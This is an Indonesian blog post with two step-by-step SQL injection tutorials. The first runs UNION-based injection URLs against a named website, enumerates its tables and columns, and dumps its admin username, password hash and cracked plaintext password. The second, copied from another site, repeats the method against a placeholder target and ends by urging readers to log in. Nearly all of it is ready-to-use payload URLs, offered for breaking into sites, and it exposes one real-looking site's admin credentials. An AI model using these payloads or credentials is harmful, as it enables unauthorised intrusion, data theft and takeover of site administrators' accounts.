SOY YOUNK BLOG'S

UNTUK SAHABAT BLOG INI DI BUAT…………………………

SQL INJECTION TUTOR/ HACKING WEB

TUTORIAL PERTAMA:

Pertama cari target yg mengandung bug’s atau situs2 VULN…disini target kita adalah

http://www.dpsmbd.com

Contoh:

http://www.dpsmbd.com/newsdetail.php?id=1  <— nampak biasa ( lalu beri tanda string (‘) di belakang’a…)

menjadi :

http://www.dpsmbd.com/newsdetail.php?id=1‘ <— muncul error SQL ( berarti situs ini VULN )

ket: Bisa juga dengan ?id=1…

setelah itu mulai mencari jumlah urutan table dengan order by ( dalam beberapa kasus order by tidak akan berfungsi…)

Contoh :

http://www.dpsmbd.com/newsdetail.php?id=-1 order by 2–   <– beri tanda min (-) didepan dan tanda (–) dibelakang sebagai maksud pembuka dan penutup,

jika situs masih tampak normal silahkan lanjutkan sampai menemui halaman yg error.

Misalkan :

http://www.dpsmbd.com/newsdetail.php?id=-1 order by 2–

http://www.dpsmbd.com/newsdetail.php?id=-1 order by 3–

http://www.dpsmbd.com/newsdetail.php?id=-1 order by 4–

http://www.dpsmbd.com/newsdetail.php?id=-1 order by 5–

http://www.dpsmbd.com/newsdetail.php?id=-1 order by 6–

http://www.dpsmbd.com/newsdetail.php?id=-1 order by 7–

http://www.dpsmbd.com/newsdetail.php?id=-1 order by 8–

http://www.dpsmbd.com/newsdetail.php?id=-1 order by 9–

http://www.dpsmbd.com/newsdetail.php?id=-1 order by 10–    <– ternyata yang ini muncul error

ket : ga perlu ngurut…di loncat2 juga bisa yg penting ketemu pertemuan antara error dan tidak’a pas dimana…

Selanjutnya melakukan colomn count dengan UNION SELECT menggunakan angka hingga keluar daftar angka didalam situs tersebut….

Contoh :

http://www.dpsmbd.com/newsdetail.php?id=-1 union select 1–                  <— angka belum keluar

http://www.dpsmbd.com/newsdetail.php?id=-1 union select 1,2–

http://www.dpsmbd.com/newsdetail.php?id=-1 union select 1,2,3–

http://www.dpsmbd.com/newsdetail.php?id=-1 union select 1,2,3,4–              <— angka belum keluar

http://www.dpsmbd.com/newsdetail.php?id=-1 union select 1,2,3,4,5–

http://www.dpsmbd.com/newsdetail.php?id=-1 union select 1,2,3,4,5,6–

http://www.dpsmbd.com/newsdetail.php?id=-1 union select 1,2,3,4,5,6,7–

http://www.dpsmbd.com/newsdetail.php?id=-1 union select 1,2,3,4,5,6,7,8–

http://www.dpsmbd.com/newsdetail.php?id=-1 union select 1,2,3,4,5,6,7,8,9–     <– Keluar angka’a…ternyata angka 3 dan 4

ket:  anda bisa sebenar’a langsung ke union select 1,2,3,4,5,6,7,8,9–

karna order by yang tadi dilakukan sampai angka 9 sebelum terjadi error’a….

Setelah tau angka apa saja yg keluar setelah melakukan column count, kita tinggal mencari daftar table’a…dan menaruh group_concat(table_name) di urutan nomor yg tadi keluar di web tersebut…

dan menaruh “from information_schema.tables where table_schema=database()–” diakhir angka  ” berarti 9 “……

contoh :

http://www.dpsmbd.com/newsdetail.php?id=-1 union select 1,2,group_concat(table_name),4,5,6,7,8,9 from information_schema.tables where table_schema=database()–

jika keluar daftar table’a…pilihlah table mana yg ingin kita exploitasi…Misalkan kita pilih table “admin”

untuk mencari nama kolom didalam table admin, terlebih dahulu kita merubah/meng convert text “admin” kedalam Hexadecimal

ke situs http://www.string-functions.com/string-hex.aspx

hasil hex dari admin = 61646d696e setiap hexadecimal diawali dengan 0x…dan menjadi 0x61646d696e

lalu tambahkan

limit 1,1–

limit 2,1–

limit 3,1–

limit 4,1–

Fungsi’a untuk mengetahui nama kolom dari table yang dimaksud.

contoh:

http://www.dpsmbd.com/newsdetail.php?id=-1 union select 1,2,column_name,4,5,6,7,8,9 from information_schema.columns where table_name=0x61646d696e limit 1,1–

http://www.dpsmbd.com/newsdetail.php?id=-1 union select 1,2,column_name,4,5,6,7,8,9 from information_schema.columns where table_name=0x61646d696e limit 2,1–

http://www.dpsmbd.com/newsdetail.php?id=-1 union select 1,2,column_name,4,5,6,7,8,9 from information_schema.columns where table_name=0x61646d696e limit 3,1–

http://www.dpsmbd.com/newsdetail.php?id=-1 union select 1,2,column_name,4,5,6,7,8,9 from information_schema.columns where table_name=0x61646d696e limit 4,1–

Berikut nama2 kolom dari hasil exploitasi..

limit 1,1–     <– nama kolom ” id ”

limit 2,1–     <– nama kolom ” user_name ”

limit 3,1–     <– nama kolom ” pass_word ”

limit 4,1–     <– nama kolom ” admin_email ”

yang akan kita exploitasi selanjutnya adalah isi dari nama kolom ” user_name ” dan ” pass_word ”

contoh :

http://www.dpsmbd.com/newsdetail.php?id=-1 union select 1,2,group_concat(user_name,0x3a,pass_word),4,5,6,7,8,9 from admin–

atau bisa juga satu per satu dengan cara memisahkan nama kolom

contoh:

http://www.dpsmbd.com/newsdetail.php?id=-1 union select 1,2,user_name,4,5,6,7,8,9 from admin–    <— untuk melihat username

http://www.dpsmbd.com/newsdetail.php?id=-1 union select 1,2,pass_word,4,5,6,7,8,9 from admin–     <— untuk melihat password

Maka keluarlah isi dari kolom tersebut, dengan isi :

superadmin@dps.com:44771849be55a878c9651a1794308cf5

yang berarti :

user_name = superadmin@dps.com

pass_word = 44771849be55a878c9651a1794308cf5   <— HASH MD5

karna password’a masih berbentuk hash…maka anda decrypt terlebih dahulu hash tersebut ke http://www.md5decrypter.co.uk/

dan akan ditemukan hasil’a menjadi :

password = DPSmbd

setelah mengetahui username dan password’a, tugas anda selanjutnya adalah mencari login page admin dari situs tersebut.

silahkan gunakan tool finder page admin atau menggunakan jasa online ke http://sc0rpion.ir/af/

NB : Tehnik diatas tidaklah baku dan bersifat prosedural….kalian bisa menggunakan cara lain…..

dari  grup  facebook  kami INDONESIAN CYBER CENTER ( a.n black holes)

TUTORIAL KEDUA :

ini salah satu cara melakukan tekhnik SQL injection, cara ini saya copas dari http://jasakom.com oleh seorang penulis sebut saja Ucups

oke, mari kita simak bersama-sama.

1. Pertama kali yang kita lakukan tentu mencari target. Misalnya target kita kali ini adalah http://www.target.com/berita.php?id=100

2. Tambahkan karakter ‘ pada akhir url atau menambahkan karakter “-” untuk melihat apakah ada pesan error.

Contoh :

http://www.target.com/berita.php?id=100

atau

http://www.target.com/berita.php?id=-100

4. Maka akan muncul pesan error…

“You have an error in your SQL syntax.You have an error in your SQL syntax; check the

manual that corresponds to your MySQL server version for the right syntax to use near ”’

at line 1″ Dan masih banyak lagi macamnya.

5. Next step adalah mencari dan menghitung jumlah table yang ada dalam databasenya…

Disini kita akan menggunakan perintah order by

Contoh :

http://www.target.com/berita.php?id=100+order+by+1/*

Hohoho…apalagi itu “/*” ? Itu adalah karakter penutup perintah SQL atau kita juga bisa pake “–“. Terserah aja…

Kalo “+” sebagai penghubung perintah…

6. Nah sampe sini langsung dah nyobain satu2…

http://www.target.com/berita.php?id=100+order+by+1/* (gak ada error)

http://www.target.com/berita.php?id=100+order+by+2/* (gak ada juga)

http://www.target.com/berita.php?id=100+order+by+3/* (capek dah)

http://www.target.com/berita.php?id=100+order+by+4/* (jangan nyerah)

Sampai muncul error…

Misalkan errornya disini…

http://www.target.com/berita.php?id=100+order+by+10/*

Berarti yang kita ambil adalah “9”

http://www.target.com/berita.php?id=100+order+by+9/*

7. Untuk mengetahui berapa angka yang show sekarang kita pake UNION

Contoh :

http://www.target.com/news.php?id=100+union+select+1,2,3,4,5,6,7,8,9/*

Trus perhatikan angka berapa yang keluar (Kayak togel aja… ;p)

8. Misalnya angka hoki yang keluar adalah “3” maka yang bisa akan kita lakukan adalah mengecek versi berapa mysql yang dipake dengan perintah “version()” atau “@@version”

http://www.target.com/news.php?id=100+union+select+1,2,version(),4,5,6,7,8,9/*

Atau

http://www.target.com/news.php?id=100+union+select+1,2,@@version,4,5,6,7,8,9/*

9. Nah kalo versinya 5 langsung aja pake perintah “information_schema” untuk melihat tabel dan kolom yang ada pada database…

Contoh :

http://www.target.com/berita.php?id=100+union+select+1,2,table_name,4,5,6,7,8,9+from+information_schema.tables/*

Nah katanya kalo untuk melihat tabel-tabel yang lain kita tambahkan LIMIT pada akhir URL. Tapi waktu itu gua gak pake keliatan kok tabelnya…Apa gua salah? Mungkin tapi sekarang yang gua mau jelaskan adalah VERSI DAN PENGALAMAN GUA. Mungkin agak lain…ya maklum lah baru belajar…Hehehe…

Misalnya yang lo liat adalah table “admin”

Nah sekarang kita liat-liat dulu kolomnya dengan mengganti aja kata “table”-nya…

Contoh:

http://www.target.com/berita.php?id=100+union+select+1,2,column_name,4,5,6,7,8,9+from+information_schema.colums/*

Misalnya kolom yang keluar adalah “password” dan “username”

Langsung aja kita liat isinya…

Contoh :

http://www.target.com/news.php?id=100+union+select+1,username,3,4,5,6,7,8,9+from+admin/*

dan

http://www.target.com/news.php?id=100+union+select+1,password,3,4,5,6,7,8,9+from+admin/*

Bisa diliat dah username ama passwordnya…Tinggal login…Cari yang asik terus…Terserah Anda…

—————————————————

begitulah yang dituliskan disana.

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s

%d blogger menyukai ini: